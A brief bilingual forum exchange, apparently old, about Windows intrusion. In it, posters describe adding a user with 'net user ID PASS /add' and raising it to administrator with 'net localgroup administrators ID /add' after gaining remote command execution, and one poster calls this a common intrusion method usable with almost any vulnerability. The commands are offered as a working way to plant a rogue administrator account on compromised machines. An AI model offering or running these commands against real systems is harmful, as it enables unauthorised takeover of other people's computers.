ft，至少第二条命令的权限是没有的

不会吧...这是很常见的入侵手段了...
几乎所有漏洞都可以这么用的呀...
你能执行外部命令就可以了

c:\ first
then type in such stuff
or winnt\system32\net "stuff" (if u use IE to perform such command remotely)
i am not a computer person(finance major)...can not explain 2 much detail....
net user ID PASS /add (add new user)
net localgroup administrators ID /add (set the user as an administrator)
